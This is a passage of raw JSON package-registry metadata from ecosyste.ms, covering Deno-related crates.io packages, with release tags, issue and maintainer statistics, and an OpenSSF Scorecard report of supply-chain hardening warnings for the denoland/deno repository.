:null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T17:39:28.847Z","dependent_packages_count":0,"downloads":150251,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.33405975798588,"dependent_repos_count":23.63229599885272,"dependent_packages_count":31.354080022945645,"stargazers_count":0.0017203709119686203,"forks_count":0.06594755162546379,"docker_downloads_count":null,"average":30.077620740464333},"purl":"pkg:cargo/deno_os","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_os","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_os","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_os/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-14T04:51:13.251Z","updated_at":"2025-01-14T04:51:13.251Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-15T11:36:46.123Z","updated_at":"2025-01-15T11:36:46.123Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858420,"name":"pacup-rs","ecosystem":"cargo","description":"Help maintainers update pacscripts","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:16:06.768Z","latest_release_published_at":"2023-01-11T08:22:42.058Z","latest_release_number":"2.0.0","last_synced_at":"2026-09-07T22:56:25.109Z","created_at":"2023-01-11T08:24:13.984Z","updated_at":"2026-09-07T22:56:25.110Z","registry_url":"https://crates.io/crates/pacup-rs/","install_command":"cargo install pacup-rs","documentation_url":"https://docs.rs/pacup-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using 